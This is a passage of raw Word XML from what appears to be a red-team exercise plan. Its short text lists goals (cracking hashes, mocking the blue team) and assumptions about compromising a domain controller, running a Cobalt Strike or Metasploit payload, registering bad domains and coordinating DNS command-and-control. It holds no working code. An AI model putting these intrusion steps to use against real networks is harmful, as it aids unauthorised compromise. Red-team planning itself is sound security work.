      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="462C562B" w14:textId="43AB3D82" w:rsidR="008A47AB" w:rsidRDefault="008A47AB" w:rsidP="008A47AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Crack hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C08B00" w14:textId="1C696F8A" w:rsidR="00A955FE" w:rsidRDefault="00A955FE" w:rsidP="00A955FE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Collect Blue Team tears.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B57BFBB" w14:textId="77777777" w:rsidR="00B23C44" w:rsidRDefault="00B23C44" w:rsidP="00B23C44">
      <w:r>
        <w:t>Assumptions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FAED13" w14:textId="0EE9C2A9" w:rsidR="006C3886" w:rsidRDefault="006C3886" w:rsidP="00B23C44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Team two cracking the DC provides enough access to dump and execute our CS payload</w:t>
      </w:r>
      <w:r w:rsidR="00A955FE">
        <w:t xml:space="preserve"> through CS or Metasploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1063173E" w14:textId="53D54120" w:rsidR="00B23C44" w:rsidRDefault="00A955FE" w:rsidP="00B23C44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>DNS server administration is completed in the whitespace allowing us to create a number of useable bad domains.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B893526" w14:textId="3E29885E" w:rsidR="00DE7817" w:rsidRDefault="006C3886" w:rsidP="00A955FE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Deconflict with team 1 DNS c2</w:t>
      </w:r>
      <w:r w:rsidR="00A955FE">
        <w:t>. How are you guys doing this, do you need anything from us?</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00DE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3D51"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="942C02AE"/>
    <w:lvl w:ilvl="0" w:tplc="6ACCA5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956059"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C9DA2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27603"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="ACE09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F11C3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9E5E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0F37"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C6FA1A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71D153C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C9DA2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A51E9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D3F27962"/>
    <w:lvl w:ilvl="0" w:tplc="F228856A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33F0C81"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AF5249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A0C45"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AB8ED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519"/>
    <w:rsid w:val="000E5FFF"/>
    <w:rsid w:val="001153A8"/>
    <w:rsid w:val="0013077A"/>
    <w:rsid w:val="001E6C05"/>
    <w:rsid w:val="002070E5"/>
    <w:rsid w:val="002D2C8E"/>
    <w:rsid w:val="002E7408"/>
    <w:rsid w:val="00365992"/>
    <w:rsid w:val="003A0AF8"/>
    <w:rsid w:val="00403350"/>
    <w:rsid w:val="00407789"/>
    <w:rsid w:val="00480422"/>
    <w:rsid w:val="004B0350"/>
    <w:rsid w:val="00562FB3"/>
    <w:rsid w:val="00567924"/>
    <w:rsid w:val="0057387A"/>
    <w:rsid w:val="00573DF9"/>
    <w:rsid w:val="005E34E7"/>
    <w:rsid w:val="0060438C"/>
    <w:rsid w:val="0067170D"/>
    <w:rsid w:val="006C3886"/>
    <w:rsid w:val="006C4EDB"/>
    <w:rsid w:val="006C60A7"/>
    <w:rsid w:val="007C37AF"/>
    <w:rsid w:val="007F0438"/>
    <w:rsid w:val="0084226A"/>
    <w:rsid w:val="008A47AB"/>
    <w:rsid w:val="008C0D25"/>
    <w:rsid w:val="008C4EFE"/>
    <w:rsid w:val="008F1521"/>
    <w:rsid w:val="009B4FED"/>
    <w:rsid w:val="009D117A"/>
    <w:rsid w:val="00A41411"/>
    <w:rsid w:val="00A955FE"/>
    <w:rsid w:val="00AF12FA"/>
    <w:rsid w:val="00B23C44"/>
    <w:rsid w:val="00BB0C87"/>
    <w:rsid w:val="00BD55FD"/>
    <w:rsid w:val="00C310D7"/>
    <w:rsid w:val="00C858B7"/>
    <w:rsid w:val="00D0200B"/>
    <w:rsid w:val="00D60ACB"/>
    <w:rsid w:val="00DE7817"/>
    <w:rsid w:val="00E041C2"/>
    <w:rsid w:val="00E1451C"/>
    <w:rsid w:val="00EF0558"/>
    <w:rsid w:val="00F51519"/>
    <w:rsid w:val="00F62915"/>
    <w:rsid w:val="00F74455"/>
    <w:rsid w:val="00FE30E9"/>
    <w:rsid w:val="00F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B2F6"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{500F69ED-1080-4EB1-AA58-EEB130B3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3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Ryne [US] (DS) (Contr)</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Ian McConnell</cp:lastModifiedBy>
  <cp:revision>9</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-06-11T14:09:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-06-11T22:41:00Z</dcterms:modified>
</cp:coreProperties>
</file>